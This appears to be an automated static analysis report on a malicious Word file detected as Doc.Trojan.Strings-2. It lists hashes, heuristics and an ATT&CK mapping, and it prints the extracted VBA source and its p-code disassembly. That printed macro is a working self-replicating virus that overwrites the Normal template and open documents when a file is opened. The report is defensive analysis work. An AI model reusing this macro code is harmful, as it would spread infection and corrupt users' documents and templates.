Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 297637faa4c1c191…

MALICIOUS

Office (OLE)

48.5 KB Created: 2000-08-28 13:19:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 62ed7fbf72364c0844aa7b5830397156 SHA-1: 5d8a6e6cab3dc49dd4fd1fea7e0b72133f832d24 SHA-256: 297637faa4c1c191149cbecda2c21b6d0b1abf2d5c08fc57254dcea4c73bb313
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro, which is a critical heuristic firing. The macro code attempts to modify the macro code of both the Normal template and the active document. This behavior suggests an attempt to establish persistence or modify document content, characteristic of malware. The ClamAV detection further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Strings-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Strings-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3335 bytes
SHA-256: 1507689c579701d6a6adbf463691b25490bdd5e2deb25742d0ad346432195988
Detection
ClamAV: Doc.Trojan.Strings-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'poruka
Private Sub Document_Open()
Dim a, b, c
c = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 16): GoTo f
f: b = Strings.LTrim$(c): a = b: GoTo provjera
provjera: If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'poruka" Then GoTo k
k: With NormalTemplate.VBProject.VBComponents(1).CodeModule
.DeleteLines 1, NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
.InsertLines 1, a: GoTo l
End With
l: If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'poruka" Then GoTo i
i: With ActiveDocument.VBProject.VBComponents(1).CodeModule
.DeleteLines 1, ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
.InsertLines 1, a: GoTo kraj
End With
kraj: End Sub

' Processing file: /opt/analyzer/scan_staging/24e2815ac5a34786b34f083ff9a7423e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3029 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0006 "poruka"
' Line #1:
' 	FuncDefn (Private Sub ActiveDocument())
' Line #2:
' 	Dim 
' 	VarDefn a
' 	VarDefn B
' 	VarDefn c
' Line #3:
' 	LitDI2 0x0001 
' 	LitDI2 0x0010 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St c 
' 	BoS 0x0000 
' 	GoTo F 
' Line #4:
' 	Label F 
' 	Ld c 
' 	Ld Strings 
' 	ArgsMemLd LTrim$ 0x0001 
' 	St B 
' 	BoS 0x0000 
' 	Ld B 
' 	St a 
' 	BoS 0x0000 
' 	GoTo provjera 
' Line #5:
' 	Label provjera 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "'poruka"
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	GoTo DeleteLines 
' 	EndIf 
' Line #6:
' 	Label DeleteLines 
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #7:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd InsertLines 
' 	ArgsMemCallWith CountOfLines 0x0002 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld a 
' 	ArgsMemCallWith l 0x0002 
' 	BoS 0x0000 
' 	GoTo MsgBox 
' Line #9:
' 	EndWith 
' Line #10:
' 	Label MsgBox 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld i 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "'poruka"
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	GoTo kraj 
' 	EndIf 
' Line #11:
' 	Label kraj 
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	Ld i 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld i 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd InsertLines 
' 	ArgsMemCallWith CountOfLines 0x0002 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld a 
' 	ArgsMemCallWith l 0x0002 
' 	BoS 0x0000 
' 	GoTo _B_var_Set 
' Line #14:
' 	EndWith 
' Line #15:
' 	Label _B_var_Set 
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.